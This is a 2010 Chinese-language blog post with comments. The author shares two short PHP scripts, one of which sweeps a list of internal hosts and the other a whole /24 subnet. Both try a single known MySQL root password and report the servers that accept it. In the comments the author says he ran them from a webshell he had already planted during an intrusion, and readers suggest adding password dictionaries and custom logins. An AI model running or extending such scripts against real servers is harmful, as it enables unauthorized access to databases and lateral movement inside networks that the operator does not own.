放个简单的MYSQL服务器猜密码脚本

angel 发表于 2010-01-25, 4:19 AM. 发表在: 技术相关

昨日渗透时，整段都是MYSQL服务器。在某个WEB下。用如下脚本来猜了一下MYSQL密码。还真有两个。在WEB下用脚本来弄也方便快捷。MSSQL的同理。。

这个是已知开了3306的。。

<?php

$hostdb = array(
	'192.168.168.10',
	'192.168.168.20',
	'192.168.168.20',
	'192.168.168.40',
	'192.168.168.50',
	'192.168.168.60',
	'192.168.168.70',
	'192.168.168.80',
	'192.168.168.90',
	'192.168.168.100'
);

$dbu = 'root';
$dbp = '1qaz2wsx';

foreach ($hostdb as $host) {
	if(@mysql_connect($host, $dbu, $dbp)) {
		echo $host.' - '.$dbu.' - '.$dbp.' ... OK<br>';
	}
}

echo 'done.';

?>

举一反三，这是全段猜的。

<?php

$ips = '192.168.168.';
$dbu = 'root';
$dbp = '1qaz2wsx';

for ($i=1; $i<254; $i++) {
	if(@mysql_connect($ips.$i, $dbu, $dbp)) {
		echo $ips.$i.' - '.$dbu.' - '.$dbp.' ... OK<br>';
	}
}

echo 'done.';

?>

上一篇: Sablog-X 2.0 Beta(20100124)
下一篇: 记录一个MSSQL的小技巧

访客评论点击获得Trackback地址

#1

回复

Lin.x 2010-01-25, 9:56 AM

你这不叫猜吧...
至少也得搞个密码字典遍历下....

你这叫已知密码的试探性连接.

#2

回复

ware 2010-01-25, 4:06 PM

渗透是违法的

#3

回复

robert 2010-01-25, 4:20 PM

这个不错..
不过用户名和密码可以自定义就好了..

因为旁注的话,一个虚拟机下面有很多的网站,每个网站的mysql都是以域名来做user,以域名+com 什么的来做密码

如果自定义用户和密码..效率能提高不少!!!

#4

回复

angel 2010-01-25, 6:10 PM

自己定义一下密码不就是猜咯？自己做一个表单。从表单获取密码放到里面去。就可以自定义啦。扩展一下嘛。很简单的。

#5

回复

cers 2010-01-25, 11:10 PM

代码倒不是很难懂，遍历C类地址
难的是怎么把这段代码放到人家服务器上去？

#6

回复

angel 2010-01-25, 11:29 PM

我都已经拿到WEBSHELL了啊。不然怎么放呢？

#7

回复

hxs12 2010-01-26, 8:14 PM

还是不懂怎么黑站。。。
要不然咱也做个闲逛者。。o(∩_∩)o 哈哈~~

#8

回复

xxoo 2010-01-26, 8:21 PM

很简单，很方便，这是不是属于社工，根据一个猜别的？

#9

回复

angel 2010-01-26, 8:31 PM

这个怎么属于社工呢？

#10

回复

冷月渡云 2010-02-05, 11:28 PM

前辈你好，其实你这个脚本还是不怎么太理想！至少将一些弱口令预设为数组.然后再去取好点吧？

code 2 代码有问题呀..$ips = '192.168.168.';太久没碰PHP了好像要加上变量$i吧？

#11

回复

angel 2010-02-06, 2:03 AM

有什么问题呢？执行看看呀。

#12

回复

冷月渡云 2010-02-09, 12:33 AM

道歉了,少看了不得. 连接符号

#13

回复

huihui 2010-03-13, 10:54 PM

你好，看了你的博客能看出来你是网站的设计高手哈，现在我有个问题想请教下，一个类似新浪的门户网站如何在本地测试，我配置了asp环境，是否还要配置php运行环境，配置好又该如何修改数据库？有论坛，我需要做哪些？该如何做。联系QQ：136172081 希望能得到你的帮助。

发表评论